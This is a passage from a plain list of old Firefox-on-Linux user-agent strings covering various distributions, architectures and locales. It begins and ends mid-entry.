Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20090206 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.2pre) Gecko/20061023 SUSE/2.0.0.1-0.1 Firefox/2.0.0.2pre\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9a1) Gecko/20060127 Firefox/1.6a1\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2\nMozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (X11; U; Linux i686 (x86_64); nl; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.2 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686 (x86_64); ru; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686 (x86_64); zh-TW; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.6) Gecko/20091216 Fedora/3.5.6-1.fc11 Firefox/3.5.6 GTB6\nMozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.2.8) Gecko/20100722 Ubuntu/10.04 (lucid) Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.8.0.10) Gecko/20070508 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.8.1) Gecko/20061010 Firefox/2.0\nMozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux ia64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux MIPS32 1074Kf CPS QuadCore; en-US; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux sparc64; en-US; rv:1.8.1.17) Gecko/20081108 Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux x64_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7\nMozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; de-AT; rv:1.8.0.2) Gecko/20060422 Firefox/1.5.0.2\nMozilla/5.0 (X11; U; Linux x86_64; de-DE; rv:1.8.1.6) Gecko/20070802 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-6.1 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.11) Gecko/2009070611 Gentoo Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008090713 Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.7) Gecko/2009030620 Gentoo Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.1.10) Gecko/20100506 SUSE/3.5.10-0.1.1 Firefox/3.5.10\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6\nMozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9) Gecko/2008061017 Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; el-GR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-0.1 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 FirePHP/0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 FirePHP/0.1.1.2\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.5) Gecko/2008122010 Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc9 Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 FirePHP/0.2.4\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-2.el5 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-NZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US) Gecko Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.10) Gecko/20050724 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051127 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051218 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20060202 CentOS/1.0.7-1.4.3.centos4 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.10) Gecko/20070409 CentOS/1.5.0.10-2.el5.centos Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.12) Gecko/20070530 Fedora/1.5.0.12-1.fc6 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.12) Gecko/20070718 Red Hat/1.5.0.12-3.el5 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.12) Gecko/20080419 CentOS/1.5.0.12-0.15.el4.centos Firefox/1.5.0.12 pango-text\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.3) Gecko/20060522 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.5) Gecko/20060911 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060911 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060919 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060924 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.9) Gecko/20070126 Ubuntu/dapper-security Firefox/1.5.0.9\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20070914 Mandriva/2.0.0.11-1.1mdv2008.0 (2008.0) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071201 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.8 (Debian-2.0.0.12-1)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-0.1 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080214 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.13) Gecko/20080208 Mandriva/2.0.0.13-1mdv2008.1 (2008.1) Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.15) Gecko/20080702 Ubuntu/8.04 (hardy) Firefox/2.0.0.15\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.16) Gecko/20080719 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.18) Gecko/20081112 Fedora/2.0.0.18-1.fc8 Firefox/2.0.0.18\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.18) Gecko/20081113 Ubuntu/8.04 (hardy) Firefox/2.0.0.18\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.19) Gecko/20081213 SUSE/2.0.0.19-0.1 Firefox/2.0.0.19\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20070322 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20070324 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20070415 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070529 SUSE/2.0.0.4-6.1 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070604 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070627 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.7) Gecko/20070918 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071015 SUSE/2.0.0.8-1.1 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux x86-64; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061023 SUSE/2.0-37 Firefox/2.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061122 Firefox/2.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061128 Firefox/2.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061202 Firefox/2.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8) Gecko/20051201 Firefox/1.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8) Gecko/20051212 Firefox/1.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009060309 Linux Mint/7 (Gloria) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061417 Gentoo Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.16) Gecko/2009121609 Firefox/3.0.6 (Windows NT 5.1)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.17) Gecko/2010011010 Mandriva/1.9.0.17-0.1mdv2009.1 (2009.1) Firefox/3.0.17 GTB6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008072610 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008072820 Kubuntu/8.04 (hardy) Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008110312 Gentoo Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 (Linux Mint)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.4) Gecko/2008120512 Gentoo Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121806 Gentoo Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121911 CentOS/3.0.5-1.el5.centos Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122010 Firefox/2.0.0.3 (Debian-3.0.5-1)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122014 CentOS/3.0.5-1.el4.centos Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122120 Gentoo Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122406 Gentoo Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-1.4 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020407 Firefox/3.0.4 (Debian-3.0.6-1)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020519 Ubuntu/9.04 (jaunty) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2010012717 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 GTB5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030719 Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030810 Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva/1.9.0.7-0.1mdv2009.0 (2009.0) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031802 Gentoo Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032319 Gentoo Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032606 Red Hat/3.0.7-1.el5 Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1.1 Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1 Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032713 Ubuntu/9.04 (jaunty) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032908 Gentoo Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009040312 Gentoo Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Firefox/3.5.2 Slackware\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Slackware Firefox/3.5.2\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090914 Slackware/13.0_stable Firefox/3.5.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091114 Gentoo Firefox/3.5.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.6) Gecko/20100117 Gentoo Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8pre) Gecko/20091227 Ubuntu/9.10 (karmic) Firefox/3.5.5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090312 Firefox/3.1b3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 GNU/Linux/x86_64 Firefox/3.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090630 Firefox/3.5 GTB6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Gentoo Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-3.el4 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101219 Gentoo Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101223 Gentoo Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.20) Gecko/20110804 Red Hat/3.6-2.el5 Firefox/3.6.20\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100403 Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.4) Gecko/20100614 Ubuntu/10.04 (lucid) Firefox/3.6.4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 